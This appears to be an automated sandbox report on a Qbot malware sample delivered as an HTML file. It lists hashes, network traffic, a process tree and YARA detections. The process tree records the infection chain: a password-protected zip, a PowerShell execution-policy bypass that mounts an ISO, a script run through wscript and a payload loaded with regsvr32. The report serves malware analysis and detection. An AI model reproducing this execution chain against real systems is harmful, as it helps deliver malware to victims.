                                                                                                          SSDEEP:48:J6FgoGYGbYGYGpOGaHGYGpEQGbaG/QGwG7GYGRGYG7Grl3bgtrgt5:JCbM/
                                                                                                          MD5:DE45885E56CA3E0799B566EACD742DDB
                                                                                                          SHA1:337C24EEB8A852F2DEB4255739815959BFA13E5D
                                                                                                          SHA-256:3872748C66CFF48FE67F972E47DEA2831C44485FEEF6F7C9F995FE0A224DAA80
                                                                                                          SHA-512:FF0A24C6359C3E20366FDE98309A51ED024524B076644EEA1856E8A6524A03F42442CA306EF3EBBCA3C42977BCD98350AB99E84D4E50795D58A2BA4020F9E8B3
                                                                                                          Malicious:false
                                                                                                          Preview:09/16/2022 7:14 PM: Unpack: C:\Users\user\Downloads\Calculation#8785(Sep16).zip..09/16/2022 7:14 PM: Tmp dir: C:\Users\user\AppData\Local\Temp\idbrycd1.fis..09/16/2022 7:14 PM: Use custom PW: abc444..09/16/2022 7:14 PM: Received from standard out: ..09/16/2022 7:14 PM: Received from standard out: 7-Zip 18.05 (x86) : Copyright (c) 1999-2018 Igor Pavlov : 2018-04-30..09/16/2022 7:14 PM: Received from standard out: ..09/16/2022 7:14 PM: Received from standard out: Scanning the drive for archives:..09/16/2022 7:14 PM: Received from standard out: 1 file, 401948 bytes (393 KiB)..09/16/2022 7:14 PM: Received from standard out: ..09/16/2022 7:14 PM: Received from standard out: Extracting archive: C:\Users\user\Downloads\Calculation#8785(Sep16).zip..09/16/2022 7:14 PM: Received from standard out: --..09/16/2022 7:14 PM: Received from standard out: Path = C:\Users\user\Downloads\Calculation#8785(Sep16).zip..09/16/2022 7:14 PM: Received from standard out: Type = zip..09/16/2022 7:
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:Zip archive data, at least v2.0 to extract
                                                                                                          Category:dropped
                                                                                                          Size (bytes):401948
                                                                                                          Entropy (8bit):7.999561705433483
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:6144:XoV4ebAunyTnF+xXSaGYiLgk8S+P2TeXlcZbqpAhBmu4i1XdfEfm3DbGs5:SbpnyLiXSZYcR+PWeXUPBmu5b13DT
                                                                                                          MD5:19CBE902D9B5CA858B99A9E9528C01D8
                                                                                                          SHA1:751A3E2E9F5886159B916DD3523014086B0F46CB
                                                                                                          SHA-256:3FA22F93DA3BC1D04F39A60B0AF23DDE8DD5AF876C059F01538F3D4DE4B0992E
                                                                                                          SHA-512:E0EC85CF9EF959B12D4881EABF09296FCC5C9E07475DE96AF5013B538BF623892FC6273FD3137A6FC9D8B07674EFEA7C2C698FB59323EE2B25727CFE68B2F731
                                                                                                          Malicious:false
                                                                                                          File type:HTML document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                          Entropy (8bit):6.132043959645223
                                                                                                          TrID:
                                                                                                          • HyperText Markup Language (15015/1) 20.56%
                                                                                                          • HyperText Markup Language (12001/1) 16.44%
                                                                                                          • HyperText Markup Language (12001/1) 16.44%
                                                                                                          • HyperText Markup Language (11501/1) 15.75%
                                                                                                          • HyperText Markup Language (11501/1) 15.75%
                                                                                                          File name:Calculation#8785(Sep16).html
                                                                                                          File size:763498
                                                                                                          MD5:7098151184920994fe048b20a9fbd57c
                                                                                                          SHA1:c0c017f604912f8d5f5d5104512fbca9b81c974b
                                                                                                          SHA256:fcc6ca0e284f527bfa0c8c9bc25f81389532cf7a2ddfd3e8c01ae2e7feb39ad1
                                                                                                          SHA512:e45391644f5f357b8065c87a577c5c2a71296ba26a7d3b60d5e3fbe6793b0deeb3d9bed7790dbff8e5a44bd74b20125dc1871d33d21c681c50dad6d04479cebb
                                                                                                          SSDEEP:12288:zRy9PHPgWWwSi1SYqZGmgjSXeKvXXthYsXT1gmzPZktSb66c:A9PoRi1R0kjKvthDTpzZbI
                                                                                                          TLSH:97F4CFEBF9C124098A63C25D90917BFD7D2F9547D7025AABB42B3B20CB496C70963E4C
                                                                                                          File Content Preview:<!DOCTYPE html>..<html class="wf-adobeclean-n9-active wf-adobeclean-n4-active wf-adobeclean-i4-active wf-adobeclean-n7-active wf-adobeclean-n3-active wf-adobeclean-n8-inactive wf-active" lang="en"><head><meta charset="UTF-8"><meta name="viewport" content=
                                                                                                          Timestamp | Source Port | Dest Port | Source IP | Dest IP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
--- | --- | --- | --- | ---
Sep 16, 2022 19:14:30.747745037 CEST | 54903 | 53 | 192.168.2.6 | 8.8.8.8
Sep 16, 2022 19:14:30.755414963 CEST | 51530 | 53 | 192.168.2.6 | 8.8.8.8
Sep 16, 2022 19:14:30.774255037 CEST | 53 | 54903 | 8.8.8.8 | 192.168.2.6
Sep 16, 2022 19:14:30.781635046 CEST | 53 | 51530 | 8.8.8.8 | 192.168.2.6
Sep 16, 2022 19:14:32.158396959 CEST | 53943 | 53 | 192.168.2.6 | 8.8.8.8
Sep 16, 2022 19:14:33.854310989 CEST | 56547 | 53 | 192.168.2.6 | 8.8.8.8
Sep 16, 2022 19:14:33.872088909 CEST | 53 | 56547 | 8.8.8.8 | 192.168.2.6
Sep 16, 2022 19:14:33.937418938 CEST | 59881 | 53 | 192.168.2.6 | 8.8.8.8
Sep 16, 2022 19:14:33.963018894 CEST | 53 | 59881 | 8.8.8.8 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
--- | --- | --- | --- | --- | --- | --- | --- | ---
Sep 16, 2022 19:14:30.747745037 CEST | 192.168.2.6 | 8.8.8.8 | 0xad63 | Standard query (0) | accounts.google.com | A (IP address) | IN (0x0001) | false
Sep 16, 2022 19:14:30.755414963 CEST | 192.168.2.6 | 8.8.8.8 | 0x37b9 | Standard query (0) | clients2.google.com | A (IP address) | IN (0x0001) | false
Sep 16, 2022 19:14:32.158396959 CEST | 192.168.2.6 | 8.8.8.8 | 0xd481 | Standard query (0) | use.typekit.net | A (IP address) | IN (0x0001) | false
Sep 16, 2022 19:14:33.854310989 CEST | 192.168.2.6 | 8.8.8.8 | 0x295b | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false
Sep 16, 2022 19:14:33.937418938 CEST | 192.168.2.6 | 8.8.8.8 | 0x9151 | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
--- | --- | --- | --- | --- | --- | --- | --- | --- | --- | ---
Sep 16, 2022 19:14:30.774255037 CEST | 8.8.8.8 | 192.168.2.6 | 0xad63 | No error (0) | accounts.google.com | | 142.250.184.45 | A (IP address) | IN (0x0001) | false
Sep 16, 2022 19:14:30.781635046 CEST | 8.8.8.8 | 192.168.2.6 | 0x37b9 | No error (0) | clients2.google.com | clients.l.google.com | | CNAME (Canonical name) | IN (0x0001) | false
Sep 16, 2022 19:14:30.781635046 CEST | 8.8.8.8 | 192.168.2.6 | 0x37b9 | No error (0) | clients.l.google.com | | 142.250.180.174 | A (IP address) | IN (0x0001) | false
Sep 16, 2022 19:14:32.180176973 CEST | 8.8.8.8 | 192.168.2.6 | 0xd481 | No error (0) | use.typekit.net | use-stls.adobe.com.edgesuite.net | | CNAME (Canonical name) | IN (0x0001) | false
Sep 16, 2022 19:14:33.872088909 CEST | 8.8.8.8 | 192.168.2.6 | 0x295b | No error (0) | www.google.com | | 142.250.184.100 | A (IP address) | IN (0x0001) | false
Sep 16, 2022 19:14:33.963018894 CEST | 8.8.8.8 | 192.168.2.6 | 0x9151 | No error (0) | www.google.com | | 142.250.184.100 | A (IP address) | IN (0x0001) | false
                                                                                                          • accounts.google.com
                                                                                                          • clients2.google.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
--- | --- | --- | --- | --- | ---
0 | 192.168.2.6 | 49726 | 142.250.184.45 | 443 | C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp | kBytes transferred | Direction | Data
2022-09-16 17:14:31 UTC | 0 | OUT | POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1
                                                                                                          Host: accounts.google.com
                                                                                                          Connection: keep-alive
                                                                                                          Content-Length: 1
                                                                                                          Origin: https://www.google.com
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: __Secure-ENID=6.SE=Md0Ynyf9ahpkx1CxTGF0vY434NJ6ymH-gDI2Tl5Ly-NQYGPjnNfggtiFRMAwx4JRDOC_gavEPcD5cTBJzUgtbJobmBEuJ8xi2UuotxvOZgApoqSIg1b0RP47U08XG8Bz_SExSzKy0ETSsajbToDlYyFsxfI93p7AyRAd-OeIBA0; CONSENT=PENDING+070
2022-09-16 17:14:31 UTC | 0 | OUT | Data Raw: 20
Data Ascii:
2022-09-16 17:14:31 UTC | 2 | IN | HTTP/1.1 200 OK
                                                                                                          Content-Type: application/json; charset=utf-8
                                                                                                          Access-Control-Allow-Origin: https://www.google.com
                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                          Pragma: no-cache
                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                          Date: Fri, 16 Sep 2022 17:14:31 GMT
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                          Report-To: {"group":"IdentityListAccountsHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/IdentityListAccountsHttp/external"}]}
                                                                                                          Cross-Origin-Opener-Policy: same-origin; report-to="IdentityListAccountsHttp"
                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/IdentityListAccountsHttp/cspreport
                                                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-4fpJQXvYROXKmdWXm94GJw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/IdentityListAccountsHttp/cspreport;worker-src 'self'
                                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/IdentityListAccountsHttp/cspreport/allowlist
                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                          Server: ESF
                                                                                                          X-XSS-Protection: 0
                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                          Accept-Ranges: none
                                                                                                          Vary: Accept-Encoding
                                                                                                          Connection: close
                                                                                                          Transfer-Encoding: chunked
2022-09-16 17:14:31 UTC | 4 | IN | Data Raw: 31 31 0d 0a 5b 22 67 61 69 61 2e 6c 2e 61 2e 72 22 2c 5b 5d 5d 0d 0a
Data Ascii: 11["gaia.l.a.r",[]]
2022-09-16 17:14:31 UTC | 4 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
--- | --- | --- | --- | --- | ---
1 | 192.168.2.6 | 49727 | 142.250.180.174 | 443 | C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp | kBytes transferred | Direction | Data
2022-09-16 17:14:31 UTC | 0 | OUT | GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=104.0.5112.81&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1
                                                                                                          Host: clients2.google.com
                                                                                                          Connection: keep-alive
                                                                                                          X-Goog-Update-Interactivity: fg
                                                                                                          X-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda
                                                                                                          X-Goog-Update-Updater: chromecrx-104.0.5112.81
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
2022-09-16 17:14:31 UTC | 1 | IN | HTTP/1.1 200 OK
                                                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-OTwm9hxERiObraHVGL5AhQ' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1
                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                          Pragma: no-cache
                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                          Date: Fri, 16 Sep 2022 17:14:31 GMT
                                                                                                          Content-Type: text/xml; charset=UTF-8
                                                                                                          X-Daynum: 5737
                                                                                                          X-Daystart: 36871
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                          Server: GSE
                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                          Accept-Ranges: none
                                                                                                          Vary: Accept-Encoding
                                                                                                          Connection: close
                                                                                                          Transfer-Encoding: chunked
2022-09-16 17:14:31 UTC | 2 | IN
                                                                                                          Data Ascii: 2c9<?xml version="1.0" encoding="UTF-8"?><gupdate xmlns="http://www.google.com/update2/response" protocol="2.0" server="prod"><daystart elapsed_days="5737" elapsed_seconds="36871"/><app appid="nmmhkkegccagdldgiimedpiccmgmieda" cohort="1::" cohortname=""
2022-09-16 17:14:31 UTC | 2 | IN
                                                                                                          Data Ascii: mhkkegccagdldgiimedpiccmgmieda.crx" fp="1.81e3a4d43a73699e1b7781723f56b8717175c536685c5450122b30789464ad82" hash_sha256="81e3a4d43a73699e1b7781723f56b8717175c536685c5450122b30789464ad82" protected="0" size="248531" status="ok" version="1.0.0.6"/></app></g
2022-09-16 17:14:31 UTC | 2 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Target ID:2
                                                                                                          Start time:19:14:26
                                                                                                          Start date:16/09/2022
                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                                                          Imagebase:0x7ff6f9750000
                                                                                                          File size:2851656 bytes
                                                                                                          MD5 hash:0FEC2748F363150DC54C1CAFFB1A9408
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high

                                                                                                          Target ID:5
                                                                                                          Start time:19:14:28
                                                                                                          Start date:16/09/2022
                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1960 --field-trial-handle=1800,i,15047504098167429117,11276190225124185928,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8
                                                                                                          Imagebase:0x7ff6f9750000
                                                                                                          File size:2851656 bytes
                                                                                                          MD5 hash:0FEC2748F363150DC54C1CAFFB1A9408
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high

                                                                                                          Target ID:7
                                                                                                          Start time:19:14:29
                                                                                                          Start date:16/09/2022
                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\Calculation#8785(Sep16).html"
                                                                                                          Imagebase:0x7ff6f9750000
                                                                                                          File size:2851656 bytes
                                                                                                          MD5 hash:0FEC2748F363150DC54C1CAFFB1A9408
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high

                                                                                                          Target ID:9
                                                                                                          Start time:19:14:35
                                                                                                          Start date:16/09/2022
                                                                                                          Path:C:\Windows\SysWOW64\unarchiver.exe
                                                                                                          Wow64 process (32bit):true
Commandline:"C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Downloads\Calculation#8785(Sep16).zip"
                                                                                                          Imagebase:0x730000
                                                                                                          File size:13312 bytes
                                                                                                          MD5 hash:9DE2E060A2985A232D8B96F9EC847A19
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:.Net C# or VB.NET
                                                                                                          Reputation:moderate

                                                                                                          Target ID:10
                                                                                                          Start time:19:14:38
                                                                                                          Start date:16/09/2022
                                                                                                          Path:C:\Windows\SysWOW64\7za.exe
                                                                                                          Wow64 process (32bit):true
Commandline:"C:\Windows\System32\7za.exe" x -pabc444 -y -o"C:\Users\user\AppData\Local\Temp\idbrycd1.fis" "C:\Users\user\Downloads\Calculation#8785(Sep16).zip"
                                                                                                          Imagebase:0x1210000
                                                                                                          File size:289792 bytes
                                                                                                          MD5 hash:77E556CDFDC5C592F5C46DB4127C6F4C
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high

                                                                                                          Target ID:11
                                                                                                          Start time:19:14:44
                                                                                                          Start date:16/09/2022
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff6da640000
                                                                                                          File size:625664 bytes
                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high

                                                                                                          Target ID:13
                                                                                                          Start time:19:15:02
                                                                                                          Start date:16/09/2022
                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:cmd.exe" /c powershell.exe -ex bypass -command Mount-DiskImage -ImagePath "C:\Users\user\AppData\Local\Temp\idbrycd1.fis\Calculation#8785.iso
                                                                                                          Imagebase:0x1b0000
                                                                                                          File size:232960 bytes
                                                                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high

                                                                                                          Target ID:14
                                                                                                          Start time:19:15:02
                                                                                                          Start date:16/09/2022
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff6da640000
                                                                                                          File size:625664 bytes
                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high

                                                                                                          Target ID:15
                                                                                                          Start time:19:15:03
                                                                                                          Start date:16/09/2022
                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:powershell.exe -ex bypass -command Mount-DiskImage -ImagePath "C:\Users\user\AppData\Local\Temp\idbrycd1.fis\Calculation#8785.iso"
                                                                                                          Imagebase:0x160000
                                                                                                          File size:430592 bytes
                                                                                                          MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:.Net C# or VB.NET
                                                                                                          Reputation:high

                                                                                                          Target ID:23
                                                                                                          Start time:19:15:31
                                                                                                          Start date:16/09/2022
                                                                                                          Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Windows\System32\WScript.exe" "E:\more\seeSay.js"
                                                                                                          Imagebase:0xb80000
                                                                                                          File size:147456 bytes
                                                                                                          MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          Target ID:25
                                                                                                          Start time:19:15:35
                                                                                                          Start date:16/09/2022
                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c ""E:\more\myTheir.bat" r egs v"
                                                                                                          Imagebase:0x1b0000
                                                                                                          File size:232960 bytes
                                                                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          Target ID:26
                                                                                                          Start time:19:15:36
                                                                                                          Start date:16/09/2022
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff6da640000
                                                                                                          File size:625664 bytes
                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          Target ID:27
                                                                                                          Start time:19:15:37
                                                                                                          Start date:16/09/2022
                                                                                                          Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:regsvr32 more/veryAs.db
                                                                                                          Imagebase:0x1080000
                                                                                                          File size:20992 bytes
                                                                                                          MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000001B.00000003.499883597.0000000004BF4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 0000001B.00000003.499883597.0000000004BF4000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 0000001B.00000003.499883597.0000000004BF4000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000001B.00000002.511786081.00000000031B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 0000001B.00000002.511786081.00000000031B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 0000001B.00000002.511786081.00000000031B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown

                                                                                                          Target ID:29
                                                                                                          Start time:19:16:09
                                                                                                          Start date:16/09/2022
                                                                                                          Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                          Imagebase:0x880000
                                                                                                          File size:3611360 bytes
                                                                                                          MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000001D.00000000.511078264.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 0000001D.00000000.511078264.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 0000001D.00000000.511078264.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown


                                                                                                            Execution Graph

                                                                                                            Execution Coverage:23.3%
                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                            Signature Coverage:5.5%
                                                                                                            Total number of Nodes:73
                                                                                                            Total number of Limit Nodes:4

                                                                                                            Control-flow Graph

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.441462231.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_4ee0000_unarchiver.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: :@-r$:@-r$:@-r$X1Tr
                                                                                                            • API String ID: 0-3920755545
                                                                                                            • Opcode ID: 0c074346b0bc790e5a4d48b19802484c30321b0b27fb5d939adfd0d014707de2
                                                                                                            • Instruction ID: e8f9f19ffe506436e286db66549c017e4e342a248d143ded5053f34e6344989e
                                                                                                            • Opcode Fuzzy Hash: 0c074346b0bc790e5a4d48b19802484c30321b0b27fb5d939adfd0d014707de2
                                                                                                            • Instruction Fuzzy Hash: 8D921374A01228CFDB24DF66C944BEDBBB2BF89301F1095A9D409AB354DB70AE85DF10
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • GetSystemInfo.KERNELBASE(?), ref: 00CFB2CC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.440822275.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_cfa000_unarchiver.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InfoSystem
                                                                                                            • String ID:
                                                                                                            • API String ID: 31276548-0
                                                                                                            • Opcode ID: b60f94ac073c718f49842efea0b8a6f2c156a6b53c318ebad2dcd0b8e718842d
                                                                                                            • Instruction ID: 597549be9c8a9de88afb0911daf958451b9aca64b3d7dfcb166ee5174312ebff
                                                                                                            • Opcode Fuzzy Hash: b60f94ac073c718f49842efea0b8a6f2c156a6b53c318ebad2dcd0b8e718842d
                                                                                                            • Instruction Fuzzy Hash: 8A01D1709043489FDB51CF1AD884769FBA4EF44320F18C0AADE488F752D374E908CBA2
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.441462231.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_4ee0000_unarchiver.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 8889231ce467a4dca9229bf59a4511edf76a17778e0410d7c2466eb5668230db
                                                                                                            • Instruction ID: 9f3be8f63eb637e22f00e12e2008898ea5e5e9e820e2cb953e38794e6a79c17c
                                                                                                            • Opcode Fuzzy Hash: 8889231ce467a4dca9229bf59a4511edf76a17778e0410d7c2466eb5668230db
                                                                                                            • Instruction Fuzzy Hash: 6351F871E42208DFDB08EFB5D580AEEBBB2EF8A300F205429D406B7354DB359986DB55
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

